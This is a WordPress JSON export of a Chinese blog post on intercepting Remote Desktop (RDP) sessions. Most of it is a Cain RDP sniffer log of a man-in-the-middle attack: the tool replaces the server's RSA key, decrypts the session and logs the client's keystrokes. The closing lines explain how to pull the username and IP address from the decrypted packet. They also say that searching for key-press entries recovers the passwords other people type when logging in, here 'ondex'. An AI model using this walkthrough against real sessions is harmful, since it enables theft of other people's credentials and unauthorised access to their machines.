{"id":124,"date":"2011-06-26T20:00:00","date_gmt":"2011-06-26T12:00:00","guid":{"rendered":"http:\/\/31.0.2.219:81\/?p=124"},"modified":"2014-03-11T12:16:38","modified_gmt":"2014-03-11T04:16:38","slug":"%e8%bf%9c%e7%a8%8b%e6%a1%8c%e9%9d%a2%e6%95%b0%e6%8d%ae%e6%8b%a6%e6%88%aa","status":"publish","type":"post","link":"http:\/\/www.huike007.cn\/?p=124","title":{"rendered":"\u8fdc\u7a0b\u684c\u9762\u6570\u636e\u62e6\u622a"},"content":{"rendered":"<p>\u8fdc\u7a0b\u684c\u9762\u6570\u636e\u62e6\u622a<br \/>\n\u9996\u5148\u7528\u55c5\u63a2\u5668\u55c5\u63a2<br \/>\n\u4ee5\u4e0b\u662f\u4e00\u4efd\u55c5\u63a2\u6765\u7684\u6587\u4ef6<br \/>\n\u8bb0\u5f55\u4e86\u8fdc\u7a0b\u8fde\u63a5\u684c\u9762\u7684\u6240\u6709\u8fc7\u7a0b<br \/>\n===========================================<br \/>\n=== Cain&#8217;s RDP sniffer generated file ===<br \/>\n===========================================<br \/>\n[RDP connection]<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\nServer address: 192.168.0.245<br \/>\nClient address: 192.168.14.147<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\n&#8211; RDP client version: RDPv5<br \/>\n&#8211; RDP server version: RDPv5<br \/>\n&#8211; RC4 Key size: 2 (128-bit)<br \/>\n&#8211; Encryption level: 2 (medium)<br \/>\n&#8211; Server_random length: 32 bytes<br \/>\n[Server_random]<br \/>\n0000 39 53 4c 85 d0 e3 1e dc c9 00 be e0 d2 59 0e 5c 9SL&#8230;&#8230;&#8230;.Y.\\<br \/>\n0010 2b 99 ee 18 94 2c 26 b6 ed f2 b3 83 b4 86 57 78 +&#8230;.,&amp;&#8230;&#8230;.Wx<br \/>\n&#8211; Flags: 0x1 (RDP4-style encryption)<br \/>\n&#8211; Found server RSA public key<br \/>\n&#8211; Server RSA key magic: 0x31415352 (RSA1)<br \/>\n&#8211; Server RSA modulus length + padding: 72 bytes<br \/>\n[Server RSA public key exponent (network byte order)]<br \/>\n0000 01 00 01 00 &#8230;.<br \/>\n[Server RSA public key modulus (network byte order)]<br \/>\n0000 95 1c 4c 31 84 53 99 54 80 df a1 c5 b3 be 0d 6e ..L1.S.T&#8230;&#8230;.n<br \/>\n0010 77 4f 09 8a 0a 90 3a 1b 5a dd 86 03 6d ac d5 d3 wO&#8230;.:.Z&#8230;m&#8230;<br \/>\n0020 19 34 59 eb ef 49 0a 23 48 33 14 b5 3a 79 24 6b .4Y..I.#H3..:y$k<br \/>\n0030 77 46 06 41 fa 98 a1 0d bd 77 c5 1e 94 19 07 d4 wF.A&#8230;..w&#8230;&#8230;<br \/>\n&#8211; Generating man in the middle (mitm) RSA key pair&#8230;<br \/>\n&#8211; Replacing RSA server public key modulus in network packet&#8230;<br \/>\n[Mitm public key modulus (network byte order)]<br \/>\n0000 c3 5a 73 c1 0b 6a aa b9 eb 48 e6 f6 2f 96 dd 86 .Zs..j&#8230;H..\/&#8230;<br \/>\n0010 d9 51 3c ed 35 7f 3f 86 d9 e9 d9 a4 59 a2 51 8c .Q&lt;.5.?&#8230;..Y.Q.<br \/>\n0020 07 1e 05 cd 7d 7f 82 85 3a 40 be 09 35 53 34 bb &#8230;.}&#8230;:@..5S4.<br \/>\n0030 d6 b8 48 7e e5 c4 14 a3 1d ce d9 f3 aa e0 a4 bd ..H~&#8230;&#8230;&#8230;&#8230;<br \/>\n&#8211; Calculating packet checksums&#8230;<br \/>\n&#8211; Found RSA key signature<br \/>\n[Server RSA key signature (network byte order)]<br \/>\n0000 e5 ea f3 0d bb 75 b3 9e 13 16 db 06 0f d4 e4 13 &#8230;..u&#8230;&#8230;&#8230;.<br \/>\n0010 6c 39 85 f6 38 e3 dd d9 21 1d 12 98 12 21 ae ae l9..8&#8230;!&#8230;.!..<br \/>\n0020 83 3d 28 04 8c 55 c9 ba 73 9f bf 77 78 96 51 1f .=(..U..s..wx.Q.<br \/>\n0030 23 af c3 c2 da 95 19 b9 ba 00 86 f2 fe 37 a3 79 #&#8230;&#8230;&#8230;&#8230;7.y<br \/>\n0040 00 00 00 00 00 00 00 00 &#8230;&#8230;..<br \/>\n&#8211; Calculating MD5 hash of mitm public key&#8230;<br \/>\n[MD5 hash of mitm public key]<br \/>\n0000 27 c0 74 5b a8 b1 62 58 dd 07 77 7a 55 ba bb 25 &#8216;.t[..bX..wzU..%<br \/>\n&#8211; Calculating signature of mitm public key digest&#8230;<br \/>\n&#8211; Replacing RSA server public key signature in network packet&#8230;<br \/>\n[Mitm RSA key signature (network byte order)]<br \/>\n0000 9b 8f 76 2c 39 af 64 e6 58 1c 44 38 db 2d 85 c3 ..v,9.d.X.D8.-..<br \/>\n0010 c9 44 4c a3 cf 46 1f 51 ef e3 49 71 08 54 81 79 .DL..F.Q..Iq.T.y<br \/>\n0020 16 da f7 40 ef 94 aa b0 c0 13 63 43 46 e5 e9 49 &#8230;@&#8230;&#8230;cCF..I<br \/>\n0030 b6 57 b3 b0 6b 61 51 f9 b6 9a 57 43 b1 be c8 3d .W..kaQ&#8230;WC&#8230;=<br \/>\n&#8211; Calculating packet checksums&#8230;<br \/>\n&#8211; Encrypted client_random length + padding: 72 bytes<br \/>\n[Encrypted client_random (network byte order)]<br \/>\n0000 05 a6 99 bc 32 0e b4 3a 45 b6 88 0d 98 b5 8f ef &#8230;.2..:E&#8230;&#8230;.<br \/>\n0010 c5 44 2c 9f 43 50 04 95 35 2b 51 19 04 4f fc 4c .D,.CP..5+Q..O.L<br \/>\n0020 19 33 48 71 fc 19 f2 39 d3 84 0f 3e b7 e5 19 c2 .3Hq&#8230;9&#8230;&gt;&#8230;.<br \/>\n0030 5c ee 68 ab 41 4d ec 9f 0a 2b 47 a5 55 77 c7 11 \\.h.AM&#8230;+G.Uw..<br \/>\n&#8211; Decrypting client_random using mitm private key&#8230;<br \/>\n[Decrypted client_random]<br \/>\n0000 dc 55 4c 79 6e ba 25 f9 cd 9a 12 69 c6 4d 49 ba .ULyn.%&#8230;.i.MI.<br \/>\n0010 0c 0f 57 fb 86 86 2e 26 3d e7 d5 c8 19 8b bc 65 ..W&#8230;.&amp;=&#8230;&#8230;e<br \/>\n&#8211; Preparing mitm client_random using server public key&#8230;<br \/>\n&#8211; Replacing client_random in network packet to the server&#8230;<br \/>\n[Mitm encrypted client_random (network byte order)]<br \/>\n0000 55 1a d4 aa fd db da e2 7e fe 6d 91 1a 96 27 c8 U&#8230;&#8230;.~.m&#8230;&#8217;.<br \/>\n0010 b6 5f 9a 12 2c 7c 6b c5 6d 8d 3c 60 ca 7c 4c 05 ._..,|k.m.&lt;`.|L.<br \/>\n0020 51 fd 45 2a d9 96 94 a2 6c fd 33 83 a6 ad 1c 91 Q.E*&#8230;.l.3&#8230;..<br \/>\n0030 ac a9 73 12 b7 8e ef 56 fb 73 79 23 cc a1 65 89 ..s&#8230;.V.sy#..e.<br \/>\n&#8211; Calculating packet checksums&#8230;<br \/>\n&#8211; Generating RC4 encryption\/decryption keys&#8230;<br \/>\n&#8211; RC4 key entropy: 128-bit<br \/>\n***************************************<br \/>\n&#8211; Symmetric encryption phase reached&#8230;<br \/>\n***************************************<br \/>\n[Client packet added to stream] &#8211; 393 bytes<br \/>\n0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 &#8230;&#8230;.d&#8230;.p.zH<br \/>\n0010 00 00 00 e6 ce 1d de f6 93 b2 b0 5e ff 99 63 23 &#8230;&#8230;&#8230;..^..c#<br \/>\n0020 5f f5 b5 3e e8 82 6b 45 3d 1a d5 09 4f cb e5 02 _..&gt;..kE=&#8230;O&#8230;<br \/>\n0030 d0 bb 32 85 0d b5 90 6e 70 ab d8 90 5f 88 80 d3 ..2&#8230;.np&#8230;_&#8230;<br \/>\n0040 bc e2 a0 ec 87 13 97 67 93 72 c7 38 67 54 67 3c &#8230;&#8230;.g.r.8gTg&lt;<br \/>\n0050 cd d2 8c 20 e2 cf da f8 ff 60 aa bb db 49 2a 91 &#8230; &#8230;..`&#8230;I*.<br \/>\n0060 66 a9 4c 90 f6 e9 29 3d b2 1f cb 9d db a8 0a 01 f.L&#8230;)=&#8230;&#8230;..<br \/>\n0070 d9 10 3e 94 6c ea 07 1c 26 39 b5 c7 a5 d0 e5 e6 ..&gt;.l&#8230;&amp;9&#8230;&#8230;<br \/>\n0080 1d 7e ed ac e7 3a 82 6c 33 25 d9 81 ae 5f 3b a0 .~&#8230;:.l3%&#8230;_;.<br \/>\n0090 4b c6 47 d3 19 cb 0e eb a8 52 2b 87 30 1a 7d 88 K.G&#8230;&#8230;R+.0.}.<br \/>\n00a0 a1 88 0c 1b 9a 9e 13 eb 7c e2 cf 29 89 7d 7e 59 &#8230;&#8230;..|..).}~Y<br \/>\n00b0 42 dd 39 f5 94 46 d9 59 d5 b9 a8 40 5b 12 d0 ab B.9..F.Y&#8230;@[&#8230;<br \/>\n00c0 62 dc ef 81 31 6f 8f 0c f9 1d 50 bf e3 8f 3b 2e b&#8230;1o&#8230;.P&#8230;;.<br \/>\n00d0 02 d8 14 cc 09 b1 f8 90 22 8d b2 79 66 db 8a ce &#8230;&#8230;..&#8221;..yf&#8230;<br \/>\n00e0 60 96 83 ac b5 18 25 bc 28 db fc 2a a0 8d a2 e3 `&#8230;..%.(..*&#8230;.<br \/>\n00f0 ec 3b 73 3a a4 9c 71 74 af 2b 22 86 8c 2b f7 04 .;s:..qt.+&#8221;..+..<br \/>\n0100 01 b0 a9 ba f6 fc 70 8a f6 29 af 05 50 2c 0d 41 &#8230;&#8230;p..)..P,.A<br \/>\n0110 58 38 9f fc d7 35 cf d1 24 15 1a 2e c8 92 25 a7 X8&#8230;5..$&#8230;..%.<br \/>\n0120 80 f5 b5 50 de 10 c1 32 7d a5 90 1e 26 1f 29 59 &#8230;P&#8230;2}&#8230;&amp;.)Y<br \/>\n0130 7e 0e fd dd 4b 7e f0 0b ad 4a b3 83 e6 fa ce 0c ~&#8230;K~&#8230;J&#8230;&#8230;<br \/>\n0140 b9 ba ab 66 8a 7d 36 1a 1f 83 c9 37 1c 51 af 6f &#8230;f.}6&#8230;.7.Q.o<br \/>\n0150 05 8e a9 75 60 d1 43 c1 ab 23 7c 0c e8 4a 50 1a &#8230;u`.C..#|..JP.<br \/>\n0160 96 ce 69 9a 83 73 b7 ea da 8e 49 19 65 4a 1a cc ..i..s&#8230;.I.eJ..<br \/>\n0170 99 38 81 65 25 26 27 7c f6 5c 93 bd 9b 15 ab 91 .8.e%&amp;&#8217;|.\\&#8230;&#8230;<br \/>\n0180 b3 f9 d3 23 87 58 30 4a 84 &#8230;#.X0J.<br \/>\n[Client decrypted packet] &#8211; 393 bytes total; 366 bytes decrypted<br \/>\n0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 &#8230;&#8230;.d&#8230;.p.zH<br \/>\n0010 00 00 00 e6 ce 1d de f6 93 b2 b0 04 08 04 08 b3 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0020 43 00 00 1e 00 1a 00 00 00 00 00 00 00 53 00 45 C&#8230;&#8230;&#8230;&#8230;S.E<br \/>\n0030 00 53 00 53 00 49 00 4f 00 4e 00 2d 00 44 00 38 .S.S.I.O.N.-.D.8<br \/>\n0040 00 36 00 42 00 43 00 35 00 34 00 00 00 41 00 64 .6.B.C.5.4&#8230;A.d<br \/>\n0050 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 00 61 .m.i.n.i.s.t.r.a<br \/>\n0060 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 00 02 .t.o.r&#8230;&#8230;&#8230;.<br \/>\n0070 00 1e 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 &#8230;1.9.2&#8230;1.6.8<br \/>\n0080 00 2e 00 31 00 34 00 2e 00 31 00 34 00 37 00 00 &#8230;1.4&#8230;1.4.7..<br \/>\n0090 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 .@.C.:.\\.W.I.N.D<br \/>\n00a0 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 .O.W.S.\\.s.y.s.t<br \/>\n00b0 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 .e.m.3.2.\\.m.s.t<br \/>\n00c0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x&#8230;d.l.l<br \/>\n00d0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 &#8230; &#8230;-N.V.h.Q.<br \/>\n00e0 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e&#8230;&#8230;&#8230;&#8230;&#8230;<br \/>\n00f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0120 00 00 00 00 00 00 00 00 00 00 00 2d 4e fd 56 07 &#8230;&#8230;&#8230;..-N.V.<br \/>\n0130 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e&#8230;&#8230;&#8230;..<br \/>\n0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0180 00 00 00 07 00 00 00 00 00 &#8230;&#8230;&#8230;<br \/>\n[Server packet added to stream] &#8211; 42 bytes<br \/>\n0000 03 00 00 2a 02 f0 80 68 00 01 03 eb 70 1c 88 02 &#8230;*&#8230;h&#8230;.p&#8230;<br \/>\n0010 02 03 76 3e 10 e0 d0 e8 b3 84 e2 a2 61 d6 98 56 ..v&gt;&#8230;&#8230;..a..V<br \/>\n0020 ce b7 27 89 4d d3 bb 33 1a 56 ..&#8217;.M..3.V<br \/>\n\u4e2d\u95f4\u5185\u5bb9\u7701\u7565\u3001\u3002\u3002\u3002\u3002\u3002\u3002\u3002<br \/>\n[Server packet added to stream] &#8211; 55 bytes<br \/>\n0000 c0 37 00 4e 0f 35 7e bf 3a 2d 8d a6 0b 0b 25 2c .7.N.5~.:-&#8230;.%,<br \/>\n0010 30 52 02 27 cb 03 02 77 9d 70 45 f9 66 fa 6e 5a 0R.&#8217;&#8230;w.pE.f.nZ<br \/>\n0020 a5 b1 03 36 d4 95 3e 77 05 16 f9 c4 49 11 a4 d5 &#8230;6..&gt;w&#8230;.I&#8230;<br \/>\n0030 61 3f 1a 89 45 1a ae a?..E..<br \/>\n[Server decrypted packet] &#8211; 55 bytes total; 45 bytes decrypted<br \/>\n0000 c0 37 00 4e 0f 35 7e bf 3a 2d 80 00 25 00 03 00 .7.N.5~.:-..%&#8230;<br \/>\n0010 91 09 13 f8 6f ff ff 00 94 01 20 01 a0 01 2c 01 &#8230;.o&#8230;.. &#8230;,.<br \/>\n0020 93 01 20 01 80 02 2c 01 2a 01 04 44 00 44 06 59 .. &#8230;,.*..D.D.Y<br \/>\n0030 01 01 06 85 00 00 00 &#8230;&#8230;.<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c c7 1d f5 62 0b 75 25 90 9e 13 &#8230;..b.u%&#8230;<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c c7 1d f5 62 0b 75 25 90 01 18 &#8230;..b.u%&#8230;<br \/>\nKey released client-side: 0x18 &#8211; &#8216;o&#8217;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c ee 11 b1 37 8f 69 7e 3a 2f e0 &#8230;..7.i~:\/.<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c ee 11 b1 37 8f 69 7e 3a 00 31 &#8230;..7.i~:.1<br \/>\nKey pressed client-side: 0x31 &#8211; &#8216;n&#8217;<br \/>\n[Server packet added to stream] &#8211; 36 bytes<br \/>\n0000 c0 24 39 56 f4 ee 38 c2 6a 9e 6f 3e 1e c0 94 4e .$9V..8.j.o&gt;&#8230;N<br \/>\n0010 eb 01 3f 41 83 78 5a b8 b5 a4 2f d8 a0 5c d6 48 ..?A.xZ&#8230;\/..\\.H<br \/>\n0020 b9 f9 50 6a ..Pj<br \/>\n[Server decrypted packet] &#8211; 36 bytes total; 26 bytes decrypted<br \/>\n0000 c0 24 39 56 f4 ee 38 c2 6a 9e 80 00 16 00 03 00 .$9V..8.j&#8230;&#8230;.<br \/>\n0010 91 19 13 40 40 06 09 44 00 44 06 44 06 ff 04 06 &#8230;@@..D.D.D&#8230;.<br \/>\n0020 59 01 01 06 Y&#8230;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c f6 30 65 79 3f 40 9c 25 ed 92 &#8230;0ey?@.%..<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c f6 30 65 79 3f 40 9c 25 01 31 &#8230;0ey?@.%.1<br \/>\nKey released client-side: 0x31 &#8211; &#8216;n&#8217;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c f9 a1 54 47 ec f5 d0 2e 0e e7 &#8230;.TG&#8230;&#8230;<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c f9 a1 54 47 ec f5 d0 2e 00 20 &#8230;.TG&#8230;..<br \/>\nKey pressed client-side: 0x20 &#8211; &#8216;d&#8217;<br \/>\n[Server packet added to stream] &#8211; 38 bytes<br \/>\n0000 c0 26 b1 22 9b 71 78 78 6c 49 b4 39 46 8d 83 2f .&amp;.&#8221;.qxxlI.9F..\/<br \/>\n0010 da 68 ae 2a 0c 99 ba 4b 39 42 86 06 ee 69 b9 2d .h.*&#8230;K9B&#8230;i.-<br \/>\n0020 a0 9a f2 01 23 a7 &#8230;.#.<br \/>\n[Server decrypted packet] &#8211; 38 bytes total; 28 bytes decrypted<br \/>\n0000 c0 26 b1 22 9b 71 78 78 6c 49 80 00 18 00 03 00 .&amp;.&#8221;.qxxlI&#8230;&#8230;<br \/>\n0010 91 19 13 40 40 06 0b 44 00 44 06 44 06 44 06 ff &#8230;@@..D.D.D.D..<br \/>\n0020 05 08 59 01 01 06 ..Y&#8230;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c bd ee 83 de fb 6b f2 57 88 31 &#8230;&#8230;.k.W.1<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c bd ee 83 de fb 6b f2 57 01 20 &#8230;&#8230;.k.W.<br \/>\nKey released client-side: 0x20 &#8211; &#8216;d&#8217;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c 54 de 4e 78 d8 7e 1e d6 95 4b ..T.Nx.~&#8230;K<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c 54 de 4e 78 d8 7e 1e d6 00 12 ..T.Nx.~&#8230;.<br \/>\nKey pressed client-side: 0x12 &#8211; &#8216;e&#8217;<br \/>\n[Server packet added to stream] &#8211; 40 bytes<br \/>\n0000 c0 28 73 bb a5 7e db de 10 74 ba 33 86 df 79 d2 .(s..~&#8230;t.3..y.<br \/>\n0010 d2 54 2b 33 74 17 70 ae e5 48 aa 05 4c c3 b5 0a .T+3t.p..H..L&#8230;<br \/>\n0020 d1 8a cb 08 50 c7 fc 91 &#8230;.P&#8230;<br \/>\n[Server decrypted packet] &#8211; 40 bytes total; 30 bytes decrypted<br \/>\n0000 c0 28 73 bb a5 7e db de 10 74 80 00 1a 00 03 00 .(s..~&#8230;t&#8230;&#8230;<br \/>\n0010 91 19 13 40 40 06 0d 44 00 44 06 44 06 44 06 44 &#8230;@@..D.D.D.D.D<br \/>\n0020 06 ff 06 0a 59 01 01 06 &#8230;.Y&#8230;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c d0 c7 4a 09 30 e7 c8 07 16 69 &#8230;.J.0&#8230;.i<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c d0 c7 4a 09 30 e7 c8 07 01 12 &#8230;.J.0&#8230;..<br \/>\nKey released client-side: 0x12 &#8211; &#8216;e&#8217;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c 25 9d 2c 4a e2 af e3 07 1d cd ..%.,J&#8230;&#8230;<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c 25 9d 2c 4a e2 af e3 07 00 2d ..%.,J&#8230;..-<br \/>\nKey pressed client-side: 0x2d &#8211; &#8216;x&#8217;<br \/>\n[Server packet added to stream] &#8211; 42 bytes<br \/>\n0000 c0 2a 08 7e a3 a1 f2 c8 3a 08 d9 97 6a 21 af e5 .*.~&#8230;.:&#8230;j!..<br \/>\n0010 e9 af d0 db ed 6e 62 ca 33 14 6c b6 e7 cb 13 51 &#8230;..nb.3.l&#8230;.Q<br \/>\n0020 83 e5 c7 10 b4 6e da 1d 12 69 &#8230;..n&#8230;i<br \/>\n[Server decrypted packet] &#8211; 42 bytes total; 32 bytes decrypted<br \/>\n0000 c0 2a 08 7e a3 a1 f2 c8 3a 08 80 00 1c 00 03 00 .*.~&#8230;.:&#8230;&#8230;.<br \/>\n0010 91 19 13 40 40 06 0f 44 00 44 06 44 06 44 06 44 &#8230;@@..D.D.D.D.D<br \/>\n0020 06 44 06 ff 07 0c 59 01 01 06 .D&#8230;.Y&#8230;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c dd 64 2e 22 43 e9 7f 8a b9 68 &#8230;d.&#8221;C&#8230;.h<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c dd 64 2e 22 43 e9 7f 8a 01 2d &#8230;d.&#8221;C&#8230;.-<br \/>\nKey released client-side: 0x2d &#8211; &#8216;x&#8217;<br \/>\n[Client packet added to stream] &#8211; 12 bytes<br \/>\n0000 c4 0c 5a f4 9c 8c b6 e3 34 9f db c3 ..Z&#8230;..4&#8230;<br \/>\n[Client decrypted packet] &#8211; 12 bytes total; 2 bytes decrypted<br \/>\n0000 c4 0c 5a f4 9c 8c b6 e3 34 9f 00 1c ..Z&#8230;..4&#8230;<br \/>\nKey pressed client-side: 0x1c &#8211; &#8216;enter&#8217;<br \/>\n\u4ee5\u4e0b\u5185\u5bb9\u7701\u7565\u3002\u3002\u3002\u3002\u3002\u3002<br \/>\n\u4e0b\u9762\u662f\u9009\u51fa\u6709\u7528\u7684\u4fe1\u606f<br \/>\n\u5b9e\u73b0\u5bc6\u7801\u7834\u89e3<br \/>\n\u4ee5\u4e0b\u8fd9\u6bb5 \u8bb0\u5f55\u4e86\u5e10\u6237\u540d\u548cip\u5730\u5740\u7b49<br \/>\n[Client decrypted packet] &#8211; 393 bytes total; 366 bytes decrypted<br \/>\n0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 &#8230;&#8230;.d&#8230;.p.zH<br \/>\n0010 00 00 00 e6 ce 1d de f6 93 b2 b0 04 08 04 08 b3 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0020 43 00 00 1e 00 1a 00 00 00 00 00 00 00 53 00 45 C&#8230;&#8230;&#8230;&#8230;S.E<br \/>\n0030 00 53 00 53 00 49 00 4f 00 4e 00 2d 00 44 00 38 .S.S.I.O.N.-.D.8<br \/>\n0040 00 36 00 42 00 43 00 35 00 34 00 00 00 41 00 64 .6.B.C.5.4&#8230;A.d<br \/>\n0050 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 00 61 .m.i.n.i.s.t.r.a<br \/>\n0060 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 00 02 .t.o.r&#8230;&#8230;&#8230;.<br \/>\n0070 00 1e 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 &#8230;1.9.2&#8230;1.6.8<br \/>\n0080 00 2e 00 31 00 34 00 2e 00 31 00 34 00 37 00 00 &#8230;1.4&#8230;1.4.7..<br \/>\n0090 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 .@.C.:.\\.W.I.N.D<br \/>\n00a0 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 .O.W.S.\\.s.y.s.t<br \/>\n00b0 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 .e.m.3.2.\\.m.s.t<br \/>\n00c0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x&#8230;d.l.l<br \/>\n00d0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 &#8230; &#8230;-N.V.h.Q.<br \/>\n00e0 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e&#8230;&#8230;&#8230;&#8230;&#8230;<br \/>\n00f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0120 00 00 00 00 00 00 00 00 00 00 00 2d 4e fd 56 07 &#8230;&#8230;&#8230;..-N.V.<br \/>\n0130 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e&#8230;&#8230;&#8230;..<br \/>\n0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &#8230;&#8230;&#8230;&#8230;&#8230;.<br \/>\n0180 00 00 00 07 00 00 00 00 00<br \/>\n\u4ee5\u4e0a\u7684\u5185\u5bb9\u4e2d \u53ef\u4ee5\u770b\u51fa\u7528\u6237\u540d\u662fAdministrator<br \/>\nIp\u5730\u5740\u662f192.168.14.147<br \/>\n\u7136\u540e\u63a5\u7740\u662f\u5982\u4f55\u67e5\u770b\u5bc6\u7801<br \/>\n\u641c\u7d22Key pressed<br \/>\n\u53ef\u4ee5\u5f97\u77e5\u522b\u4eba\u767b\u9646\u65f6\u6572\u51fb\u7684\u952e\u76d8 TA\u6709\u53ef\u80fd\u8f93\u9519\u5bc6\u7801<br \/>\n\u641c\u7d22Key released\u53ef\u4ee5\u77e5\u9053\u6700\u540e\u63a5\u6536\u7684\u5bc6\u7801<br \/>\n\u4e0d\u505c\u7684\u6309\u641c\u7d22 \u5b83\u4f1a\u4e00\u4e2a\u4e00\u4e2a\u7684\u5b57\u6bcd\u5e2e\u4f60\u89e3\u6790\u51fa\u6765 \u54c8\u54c8 \u6210\u529f<br \/>\n\u8fd9\u91cc\u5f97\u51fa\u7684\u7ed3\u679c\u5c31\u662fondex\u7528<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8fdc\u7a0b\u684c\u9762\u6570\u636e\u62e6\u622a \u9996\u5148\u7528\u55c5\u63a2\u5668\u55c5\u63a2 \u4ee5\u4e0b\u662f\u4e00\u4efd\u55c5\u63a2\u6765\u7684\u6587\u4ef6 \u8bb0\u5f55\u4e86\u8fdc\u7a0b\u8fde\u63a5\u684c\u9762\u7684\u6240\u6709\u8fc7\u7a0b ========== [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[179],"tags":[182],"_links":{"self":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/124"}],"collection":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=124"}],"version-history":[{"count":1,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/124\/revisions"}],"predecessor-version":[{"id":185,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/124\/revisions\/185"}],"wp:attachment":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=124"